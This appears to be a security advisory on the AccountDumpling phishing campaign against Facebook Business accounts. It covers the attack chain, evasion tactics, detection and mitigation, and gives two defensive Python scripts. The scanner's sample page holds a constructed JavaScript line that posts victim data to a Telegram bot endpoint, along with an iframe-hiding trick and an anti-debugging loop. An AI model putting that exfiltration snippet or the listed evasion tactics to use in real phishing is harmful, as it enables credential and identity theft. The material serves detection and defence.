Google AppSheet phishing abused Netlify and Telegram to steal Facebook credentials, 2FA codes, IDs, and business account data.
Introduction
Phishing works best when the message looks trusted before the victim even reads it.
That is exactly what made the AccountDumpling campaign so dangerous.
Instead of sending phishing emails from suspicious domains or poorly configured mail servers, attackers abused Google AppSheet’s legitimate notification system. The result was a phishing email that came from real Google-controlled infrastructure, passed normal authentication checks, and appeared far more trustworthy than a typical scam message.
The campaign targeted Facebook users, page administrators, and Facebook Business account owners with urgent Meta-themed warnings.
Victims were told their accounts had been disabled, reported for copyright violations, flagged for policy issues, selected for blue badge review, or involved in suspicious login activity.
From there, the attack expanded into a full criminal pipeline involving:
- Google AppSheet
- Netlify-hosted phishing pages
- Vercel-hosted phishing flows
- Google Drive PDFs
- Canva-generated documents
- Fake recruiter lures
- Telegram bots
- Real-time operator panels
- Credential theft
- 2FA code collection
- Government ID harvesting
- Facebook Business account takeover
Researchers estimated that about 30,000 Facebook accounts were compromised.
This is not a traditional CVE-driven attack.
There is no confirmed vulnerability exploitation behind the campaign.
The weakness is trust.
Attackers abused trusted cloud platforms, familiar brand names, verified-looking emails, and urgent account recovery workflows to manipulate users into handing over everything needed to take control of valuable Facebook accounts.
For companies, creators, agencies, and social media teams, the lesson is clear:
A phishing email can pass SPF, DKIM, and DMARC and still be dangerous.
What Happened
A sophisticated phishing operation known as AccountDumpling targeted Facebook users and Facebook Business account owners worldwide.
The campaign used Google AppSheet as the initial phishing relay.
AppSheet is a legitimate Google no-code platform used to build apps, automate workflows, and send app-driven notifications. Attackers abused that notification functionality to send phishing emails that appeared to come from trusted Google infrastructure.
The emails were sent from AppSheet-related addresses and passed normal email authentication checks.
That made the messages harder for security tools and users to distrust.
The lures focused on Meta and Facebook account pressure.
Victims received messages claiming:
- Their Facebook account had a policy violation
- Their page was at risk of permanent deletion
- They needed to appeal a copyright complaint
- Their business account required verification
- They were eligible for blue badge review
- A suspicious login had been detected
- A recruiter from a major brand wanted to contact them
The destination varied by cluster.
Some victims were sent to Netlify-hosted fake Facebook Help Center pages. Others were sent to Vercel-hosted Meta verification flows. Some were directed through Google Drive-hosted PDFs generated through Canva. Others were approached through fake job offer narratives impersonating well-known brands.
The final goal remained consistent:
Steal Facebook credentials, 2FA codes, recovery information, personal data, business information, and identity documents.
Telegram was used as a central exfiltration channel.
Stolen data flowed into private Telegram channels where operators could monitor victim submissions in real time.
In some cases, the phishing kits supported live operator control, allowing attackers to react while the victim was still interacting with the page.
That made the campaign more than a static phishing kit.
It operated like a coordinated account hijacking business.
Why This Issue Is Critical
This issue is critical because it abuses trusted platforms to bypass user suspicion and security filtering.
Many organizations train users to look for suspicious senders, strange domains, broken formatting, and failed authentication checks.
AccountDumpling undermines that model.
The email came from Google AppSheet infrastructure. Authentication passed. The message did not need traditional spoofing. The link paths used platforms people recognize, including Google Drive, Netlify, Vercel, and Canva-generated files.
That creates a trust inversion.
The delivery platform is legitimate, but the message is malicious.
This is especially dangerous for Facebook Business accounts.
A compromised Facebook Business account can expose:
- Ad accounts
- Payment methods
- Business pages
- Brand assets
- Customer messages
- Campaign analytics
- Admin access
- Recovery data
- Connected Instagram accounts
- Business Manager permissions
For agencies, media teams, influencers, SMBs, and ecommerce brands, losing access to a Facebook account can create immediate business disruption.
Attackers may use hijacked accounts to:
- Run fraudulent ads
- Abuse stored payment methods
- Sell the account
- Lock out the rightful owner
- Impersonate the brand
- Target customers with scams
- Demand payment for recovery
- Resell access in underground markets
The campaign also collected more than passwords.
Some phishing flows requested dates of birth, phone numbers, government-issued ID photos, screenshots, business details, and multiple rounds of 2FA codes.
That is not just credential theft.
It is identity capture.
What Caused the Issue
The AccountDumpling campaign was caused by a combination of trusted platform abuse, social engineering, cloud-hosted phishing infrastructure, and weak account recovery controls.
There is no confirmed CVE involved.
The campaign worked because attackers understood how to exploit trust relationships.
Google AppSheet Abuse
Attackers used AppSheet’s legitimate email notification system to send phishing messages from trusted Google infrastructure.
This allowed messages to pass normal authentication checks.
Meta-Themed Panic Lures
The emails used urgency to pressure victims.
Warnings about account deletion, copyright complaints, policy violations, and login alerts are effective because Facebook Business accounts often have real financial value.
Netlify and Vercel Hosting
Attackers hosted phishing pages on trusted cloud platforms.
In many cases, unique victim-specific Netlify subdomains helped avoid blocklists because each phishing URL had a short life and limited reuse.
Google Drive and Canva Abuse
Some lures used Google Drive-hosted PDFs generated with Canva.
This gave victims a familiar document-sharing experience before sending them into a phishing flow.
Telegram Exfiltration
Telegram bots and channels received stolen credentials and identity data in real time.
That made the campaign easier to operate and scale.
Real-Time Operator Control
Some phishing panels allowed attackers to guide victims through the login and verification process live.
That helped attackers collect valid credentials, 2FA codes, ID documents, and screenshots.
Detection Evasion
The campaign used tactics such as invisible Unicode characters, Cyrillic homoglyphs, mid-word text breaking, random URLs, localization, anti-debugging scripts, encrypted local storage, shortened links, and iframe-based hiding.
These techniques made detection harder for automated tools and human reviewers.
How the Attack Chain Works
The AccountDumpling attack chain follows a cloud-abuse phishing model.
It turns trusted platforms into stepping stones for account takeover.
Initial Phishing Email
The victim receives a Meta-themed message sent through Google AppSheet.
The email appears authenticated because it comes from legitimate Google-controlled infrastructure.
Urgency or Reward Lure
The message creates pressure or temptation.
Examples include account disablement, copyright complaint, blue badge review, advertiser reward, suspicious login, or executive recruitment.
Cloud Redirect
The victim clicks the call-to-action link.
Depending on the cluster, the link may lead to Netlify, Vercel, Google Drive, a shortened URL chain, or an attacker-controlled site.
Fake Facebook or Meta Page
The victim lands on a polished phishing page that imitates Facebook, Meta Business, Privacy Center, Security Check, or Help Center workflows.
The page may include fake CAPTCHA checks, countdown timers, localized language, or full-screen iframe tricks.
Credential and Profile Collection
The victim is asked to submit personal and account data.
This may include:
- Name
- Email address
- Phone number
- Date of birth
- Business information
- Facebook password
- 2FA codes
- Government ID photos
- Browser screenshots
Forced Retry
Some flows intentionally reject the first password attempt.
This forces the victim to enter credentials again, increasing the attacker’s confidence that the password is correct.
Real-Time Operator Review
In advanced flows, operators interact with the victim session live through WebSocket-based panels.
They can test credentials, request more information, trigger additional screens, and guide the victim through the process.
Telegram Exfiltration
The stolen data is sent to Telegram bots or private channels.
Operators receive victim data quickly and can act before the victim understands what happened.
Account Takeover
Attackers log into the Facebook account, change recovery details, lock out the original owner, abuse ad accounts, or resell the account through illicit channels.
Monetization
The stolen accounts can be sold, used for fraudulent ads, abused for payment methods, or offered back through so-called recovery services.
Why This Incident Matters for Cybersecurity
This incident matters because it shows how phishing has evolved into a platform-abuse business model.
Attackers no longer need to rely on obviously suspicious domains.
They can build campaigns on trusted services.
That changes the security problem.
A domain reputation tool may trust Google AppSheet.
A user may trust a Google Drive link.
A browser may not flag a Netlify or Vercel domain.
A security gateway may see SPF, DKIM, and DMARC pass.
A victim may recognize Meta branding and react quickly because they fear losing business access.
The campaign also shows how phishing operations are becoming modular.
One actor may build the kit.
Another may send the campaign.
Another may operate Telegram channels.
Another may monetize stolen accounts.
This makes disruption harder because the operation can continue even if one component is removed.
For businesses, the incident matters because social media accounts are now operational assets.
A Facebook Business account may control advertising spend, customer communication, brand identity, commerce workflows, and audience access.
Losing it can cause financial loss, reputational damage, customer confusion, and direct fraud.
This is why social media account protection must be part of cybersecurity strategy.
It is not just a marketing issue.
Common Risks Highlighted by the Incident
The AccountDumpling campaign highlights several serious risks.
Trusted Platform Abuse
Attackers used Google AppSheet, Netlify, Vercel, Google Drive, Canva, and Telegram to make the campaign look legitimate and scalable.
Authenticated Phishing Emails
The emails passed authentication because they were sent through a legitimate service.
This shows that email authentication validates the sending platform, not the intent of the message.
Facebook Business Account Takeover
Business accounts have financial and operational value.
Attackers can abuse ad accounts, payment methods, pages, and connected assets.
2FA Code Theft
Some phishing flows collected 2FA codes in real time.
This can defeat code-based MFA (SMS or authenticator app codes) when users enter the code into a phishing page and the operator replays it before it expires.
Government ID Harvesting
Some pages requested ID photos and recovery information.
That creates identity theft and account recovery abuse risk.
Telegram-Based Exfiltration
Telegram bots gave attackers a fast and convenient way to receive stolen data.
Unique URL Evasion
Per-victim Netlify subdomains and random paths made blocklisting less effective.
Live Operator Panels
Real-time control allowed attackers to adjust the phishing flow while victims were still engaged.
Homoglyph and Unicode Evasion
Invisible characters, Cyrillic homoglyphs, and broken text patterns helped evade simple string-based detection.
Potential Impact on Organizations
The impact of this campaign can be significant for any organization using Facebook, Meta Business Suite, Instagram, or paid advertising.
Potential consequences include:
- Facebook page takeover
- Meta Business Manager compromise
- Instagram account compromise
- Ad account abuse
- Stored payment method abuse
- Fraudulent advertising spend
- Customer scams from trusted pages
- Loss of brand control
- Business interruption
- Data exposure from page messages
- Theft of ID documents
- Account recovery lockout
- Financial loss
- Reputation damage
- Customer support burden
- Legal and compliance review
For marketing agencies, the risk is even higher.
Agencies often manage multiple client pages and ad accounts. One compromised administrator account could expose multiple brands.
For SMBs, the impact can be immediate.
A stolen business page can interrupt sales, customer communications, paid campaigns, and brand visibility.
For influencers and creators, losing a Facebook or Instagram account can mean losing audience access and revenue.
The campaign also creates downstream risks.
Attackers who control a trusted business page can use it to launch more scams against followers, customers, advertisers, and partners.
What Organizations Should Do Now
Organizations should treat Facebook Business access as a security-sensitive asset.
Recommended actions include:
- Review all Facebook Business Manager administrators
- Remove inactive or unnecessary admin accounts
- Enforce strong MFA on all Meta business accounts
- Use phishing-resistant MFA where available
- Review recent login history and device activity
- Check for unknown page roles or business users
- Review ad account payment methods
- Monitor unexpected ad campaigns or spending spikes
- Watch for Meta-themed phishing emails sent through trusted platforms
- Train users not to click account appeal links in emails
- Navigate directly to Meta Business Suite instead of using email links
- Report suspicious AppSheet-originated Meta warnings
- Inspect Google Drive PDFs claiming to be Meta notices
- Block known phishing infrastructure where possible
- Monitor Netlify and Vercel links in suspicious emails
- Review Telegram bot exfiltration indicators from phishing kits
- Establish recovery procedures for hijacked social accounts
- Include social media account takeover in incident response planning
Employees should be told one simple rule:
Do not resolve Facebook account warnings from email links.
Go directly to the official Meta Business Suite or account center.
Detection and Monitoring Strategies
Detection should focus on email context, link behavior, cloud-hosted phishing pages, and social account activity.
Security teams should monitor for:
- AppSheet-originated emails impersonating Meta
- Messages from noreply@appsheet.com with Facebook or Meta urgency language
- Links to Netlify subdomains in Meta-themed emails
- Links to Vercel-hosted Meta verification pages
- Google Drive PDFs claiming account violations or verification requirements
- Canva-generated PDF metadata in phishing reports
- Shortened URL chains leading to cloud-hosted phishing
- Full-screen iframe behavior hiding the real destination
- Fake CAPTCHA pages before Meta login flows
- Forced password retry behavior
- Requests for government ID photos
- Requests for browser screenshots
- Telegram bot tokens in phishing page source
- JavaScript posting to Telegram-related endpoints
- Unicode homoglyphs in sender display names
- Invisible Unicode characters in email headers or display names
- Mid-word text splitting in email bodies
- New Facebook Business admin users
- Unknown devices logged into Facebook accounts
- New payment activity in Meta ad accounts
- Unexpected ad campaign creation
- Page role changes
- Instagram account connection changes
Security teams should correlate:
- Secure email gateway logs
- Browser telemetry
- DNS logs
- Proxy logs
- CASB alerts
- Endpoint telemetry
- Meta Business activity logs
- Payment method alerts
- User reports
- Threat intelligence feeds
Because the campaign uses trusted platforms, simple domain reputation is not enough.
Detection must consider message intent, brand impersonation, link chain behavior, and the sensitivity of the requested action.
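The following is an added example, not code from the original article or from any vendor it mentions. It puts the detection ideas above (and the evasion tactics listed under Detection Evasion) into a small Python triage script: it parses a constructed Meta-themed message relayed through noreply@appsheet.com, confirms that SPF/DKIM/DMARC all pass, and then scores the message on intent signals the page lists: brand impersonation through a trusted relay, Cyrillic homoglyphs in the display name, invisible Unicode characters that split words, urgency language, and links to Netlify/Vercel/Drive or URL shorteners. The sample headers, the relay domain list, the keyword lists and the score thresholds are assumptions chosen for illustration; the Cyrillic letter and zero-width space in the sample are constructed, not captured artifacts.

```python
"""Score a Meta-themed email that passes authentication but carries phishing intent."""
import re
import unicodedata
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed sample message (assumption: not a captured artifact). The display name
# contains a Cyrillic 'е' (U+0435) and the subject a zero-width space (U+200B), the two
# evasion tricks the article describes. Authentication-Results models a relay that
# legitimately passes SPF, DKIM and DMARC.
SAMPLE_EMAIL = (
    'From: "M\u0435ta Business Support" <noreply@appsheet.com>\n'
    "To: admin@example.com\n"
    "Subject: Your Facebook page will be permanently dele\u200bted within 24 hours\n"
    "Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=appsheet.com;"
    " dkim=pass header.d=appsheet.com; dmarc=pass header.from=appsheet.com\n"
    "\n"
    "Your account was reported for a copyright violation.\n"
    "Submit an appeal within 24 hours or your page will be permanently deleted.\n"
    "Appeal now: https://meta-appeal-7f3a2.netlify.app/review\n"
)

RELAY_DOMAINS = {"appsheet.com"}  # assumption: trusted relays seen abused in this campaign
BRAND_TERMS = ("meta", "facebook", "instagram", "business suite")
URGENCY_TERMS = ("permanently deleted", "policy violation", "copyright", "appeal",
                 "blue badge", "suspicious login", "within 24 hours", "account disabled")
CLOUD_SUFFIXES = (".netlify.app", ".vercel.app", "drive.google.com")
SHORTENERS = ("bit.ly", "t.co", "tinyurl.com", "cutt.ly")
INVISIBLE = "\u200b\u200c\u200d\u2060\ufeff\u00ad"  # zero-width chars and soft hyphen
URL_RE = re.compile(r"https?://[^\s<>\"']+")


def strip_invisible(text: str) -> str:
    """Remove zero-width characters so a split word like 'dele<ZWSP>ted' matches 'deleted'."""
    return text.translate({ord(c): None for c in INVISIBLE})


def count_invisible(text: str) -> int:
    return sum(text.count(c) for c in INVISIBLE)


def mixed_script_words(text: str) -> list:
    """Words that mix Latin letters with another script: the classic homoglyph tell."""
    hits = []
    for word in re.findall(r"\w+", text):
        scripts = {unicodedata.name(ch, "?").split(" ")[0] for ch in word if ch.isalpha()}
        if "LATIN" in scripts and len(scripts) > 1:
            hits.append(word)
    return hits


def auth_passed(msg) -> bool:
    """True when SPF, DKIM and DMARC all pass. That validates the relay, not the intent."""
    hdr = msg.get("Authentication-Results", "")
    return all(f"{m}=pass" in hdr for m in ("spf", "dkim", "dmarc"))


def classify_link(url: str) -> str:
    """Label a link as cloud-hosted (Netlify/Vercel/Drive), a shortener, or other."""
    host = (urlparse(url).hostname or "").lower()
    if any(host == s or host.endswith(s) for s in CLOUD_SUFFIXES):
        return "cloud-hosted"
    if host in SHORTENERS:
        return "shortener"
    return "other"


def assess(raw: str) -> dict:
    """Return authentication status, intent signals, a score and a verdict for one message."""
    msg = message_from_string(raw)
    display_name, address = parseaddr(msg.get("From", ""))
    subject = msg.get("Subject", "")
    body = msg.get_payload() if not msg.is_multipart() else ""
    # Normalise before keyword matching so mid-word invisible characters cannot hide terms.
    text = strip_invisible(f"{display_name} {subject} {body}").lower()
    sender_domain = address.rsplit("@", 1)[-1].lower()

    signals, score = [], 0
    if sender_domain in RELAY_DOMAINS and any(t in text for t in BRAND_TERMS):
        signals.append("brand-impersonation-via-trusted-relay"); score += 3
    if mixed_script_words(display_name + " " + subject):
        signals.append("mixed-script-homoglyph"); score += 3
    if count_invisible(subject + body):
        signals.append("invisible-unicode"); score += 2
    if any(t in text for t in URGENCY_TERMS):
        signals.append("urgency-language"); score += 2
    for url in URL_RE.findall(body):
        kind = classify_link(url)
        if kind != "other":
            signals.append(f"{kind}-link:{urlparse(url).hostname}"); score += 2

    verdict = "high" if score >= 6 else "medium" if score >= 3 else "low"  # assumed thresholds
    return {"auth_passed": auth_passed(msg), "score": score, "signals": signals, "verdict": verdict}


if __name__ == "__main__":
    print(assess(SAMPLE_EMAIL))
```

The point of the script is the combination: `auth_passed` comes back True for the sample, exactly as the article says it did for real victims, while the intent signals still push the verdict to high. In a gateway rule or SOAR playbook the same logic would run on the normalised text, since matching keywords on the raw subject would miss "dele<ZWSP>ted".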
The Role of Incident Response Planning
Organizations need response plans for social media account compromise.
Many incident response plans focus on ransomware, endpoint compromise, email compromise, and cloud account takeover.
But for marketing-heavy businesses, Facebook and Instagram accounts can be just as operationally important.
A strong response plan should include:
- Immediate lockout containment steps
- Meta account recovery contacts
- Proof-of-ownership preparation
- Admin role review
- Password resets
- MFA reset and re-enrollment
- Session revocation
- Ad account payment review
- Fraudulent campaign shutdown
- Customer communication templates
- Legal and compliance escalation
- Evidence preservation
- Review of email phishing artifacts
- Review of employee devices involved in the compromise
- Coordination with marketing, finance, legal, and security teams
Incident responders should answer:
- Who clicked the phishing link?
- What information was submitted?
- Were 2FA codes entered?
- Were government IDs uploaded?
- Was the Facebook account accessed?
- Were admin roles changed?
- Were recovery details changed?
- Was ad spend abused?
- Were customers contacted by attackers?
- Were connected Instagram accounts affected?
- Were payment methods charged?
- Were other employees targeted?
The faster these questions are answered, the faster the organization can regain control and reduce harm.
The Role of Penetration Testing
Penetration testing can help organizations understand whether trusted-platform phishing would bypass their current defenses.
A standard technical penetration test may not fully cover this risk.
Organizations should include social engineering, phishing simulation, cloud platform abuse scenarios, and account takeover testing.
A strong assessment can evaluate:
- Whether AppSheet-originated phishing messages reach inboxes
- Whether users trust authenticated emails too much
- Whether Netlify and Vercel phishing links are detected
- Whether Google Drive PDF lures are inspected
- Whether users recognize fake Meta account warnings
- Whether employees submit credentials to fake appeal pages
- Whether 2FA codes can be phished
- Whether marketing teams know account recovery procedures
- Whether Meta Business admin permissions are excessive
- Whether social media accounts have proper MFA
- Whether suspicious ad activity is detected quickly
- Whether incident response teams can recover hijacked accounts
A red team exercise can safely simulate the attack path:
- Send a controlled Meta-themed phishing lure
- Use a safe fake landing page
- Test whether users click account appeal links
- Measure whether credentials would be submitted
- Check whether security tools flag the cloud-hosted link
- Test reporting behavior
- Review SOC detection
- Validate incident response escalation
- Confirm marketing team recovery steps
This kind of testing helps answer a critical question:
If attackers targeted your social media admins tomorrow, would your business know before the account was gone?
Penetration testing should include the platforms that matter to the business, not only servers and web applications.
Protection and Mitigation Measures
Organizations should use layered controls to reduce the risk of trusted-platform phishing and Facebook Business account takeover.
Secure Meta Business Accounts
Use strong MFA on every account with page, ad, or Business Manager access.
Remove inactive users and reduce admin permissions.
Limit Administrative Access
Use least privilege for social media accounts.
Not every marketer needs full admin rights.
Train Users on Trusted-Platform Phishing
Employees should understand that Google AppSheet, Google Drive, Netlify, Vercel, and Canva can be abused.
Trusted hosting does not make a message safe.
Avoid Email-Based Account Recovery Links
Users should go directly to official Meta portals instead of clicking appeal links in emails.
Monitor Ad Account Activity
Alert on new campaigns, unusual budget increases, new payment methods, or geographic anomalies.
Review Page Roles Regularly
Check for unknown admins, editors, business users, partner access, and connected assets.
Use Browser and Email Isolation
High-risk links in email should be opened in isolated environments where possible.
Inspect Cloud-Hosted Links
Security tools should analyze the full redirect chain, not just the first trusted platform.
Block Known Phishing Patterns
Look for Meta panic language, fake policy violation wording, blue badge lures, and suspicious account recovery flows.
Detect Telegram Exfiltration
Inspect suspicious phishing kits for Telegram bot tokens, chat IDs, and related API calls.
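As an added example (not code from the article or from any phishing kit it analysed), the script below does the static triage this section and the earlier detection bullets describe: given the saved source of a suspected phishing page, it flags Telegram Bot API endpoints, bot-token-shaped strings, send methods, chat IDs, a full-screen iframe, and an anti-debugging `debugger` loop, and redacts any token before reporting so the finding can be shared safely. The sample page is constructed with placeholder values; the token regex is an approximation of the Bot API token shape (numeric bot ID, colon, 35 characters) and should be treated as an assumption rather than a specification.

```python
"""Static triage of a saved phishing page for Telegram exfiltration and hiding tricks."""
import re

# Constructed sample page (assumption: placeholder token and chat ID, not real values).
SAMPLE_PAGE = """<!doctype html>
<html><head><title>Meta Business Help Center</title></head>
<body>
<iframe src="https://lure.example/login"
        style="position:fixed;top:0;left:0;width:100vw;height:100vh;border:0"></iframe>
<script>
  setInterval(function(){ debugger; }, 500);
  var bot = "123456789:AAExampleTokenPlaceholder0000000000";
  var chat_id = "-1001234567890";
  function exfil(d){
    fetch("https://api.telegram.org/bot" + bot + "/sendMessage",
      {method:"POST", body: JSON.stringify({chat_id: chat_id, text: d})});
  }
</script>
</body></html>
"""

# Indicator name -> regex. Capturing groups, where present, hold the value to report.
INDICATORS = {
    "telegram-api-endpoint": re.compile(r"api\.telegram\.org/bot", re.I),
    "telegram-bot-token": re.compile(r"\b\d{8,10}:[A-Za-z0-9_-]{35}\b"),  # assumed shape
    "telegram-send-method": re.compile(r"/send(?:Message|Document|Photo)\b"),
    "telegram-chat-id": re.compile(r"chat_id\s*[:=]\s*[\"']?(-?\d{6,14})"),
    "fullscreen-iframe": re.compile(r"<iframe[^>]*\b(?:100vw|100vh)\b[^>]*>", re.I | re.S),
    "anti-debugging": re.compile(r"\bdebugger\b"),
}
EXFIL_INDICATORS = {"telegram-api-endpoint", "telegram-bot-token", "telegram-send-method"}


def redact_token(token: str) -> str:
    """Keep the bot ID and the first four secret characters so the token is never re-shared whole."""
    bot_id, secret = token.split(":", 1)
    return f"{bot_id}:{secret[:4]}..."


def scan(source: str) -> dict:
    """Return {indicator: [matched values]} for every indicator present in the page source."""
    findings = {}
    for name, rx in INDICATORS.items():
        matches = [m.group(1) if m.groups() else m.group(0) for m in rx.finditer(source)]
        if matches:
            findings[name] = matches
    if "telegram-bot-token" in findings:
        findings["telegram-bot-token"] = [redact_token(t) for t in findings["telegram-bot-token"]]
    return findings


def verdict(findings: dict) -> str:
    """Classify: exfiltration kit if any Telegram indicator fired, suspicious if only hiding tricks."""
    if EXFIL_INDICATORS & findings.keys():
        return "telegram-exfiltration-kit"
    return "suspicious" if findings else "clean"


if __name__ == "__main__":
    result = scan(SAMPLE_PAGE)
    for name, values in result.items():
        print(f"{name}: {values}")
    print("verdict:", verdict(result))
```

The redacted token and the chat ID are the two values worth recording in the incident: the chat ID identifies the channel receiving victim data, and the bot ID prefix is enough for an abuse report to Telegram without circulating a usable secret. The iframe and `debugger` indicators on their own only mark a page as suspicious, since legitimate pages occasionally use both.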
Prepare Recovery Evidence
Keep business ownership records, domain verification, ID requirements, ad account details, and Meta support paths ready before an incident.
Strengthen Executive and Marketing Security
Marketing teams, social media managers, and executives should receive targeted phishing training because they are common targets.
Run Regular Security Testing
Test whether employees, tools, and response teams can detect and contain trusted-platform phishing.
Key Takeaway
The AccountDumpling campaign shows how modern phishing operations are abusing trusted cloud platforms to compromise high-value social media accounts.
By using Google AppSheet to send authenticated phishing emails, attackers created messages that passed normal trust checks. By using Netlify, Vercel, Google Drive, Canva, and Telegram, they built a scalable account hijacking operation that collected credentials, 2FA codes, personal details, government ID photos, and business account data.
There is no confirmed CVE behind this campaign.
The attack works because trusted platforms are being used for untrusted intent.
For organizations, this means phishing detection must go beyond sender authentication and domain reputation. Security teams need context-aware email analysis, user training, cloud-link inspection, social media account protection, incident response planning, and penetration testing that includes trusted-platform phishing scenarios.
The message is simple:
An email can come from Google and still be part of an attack.
Trust the context, not just the platform.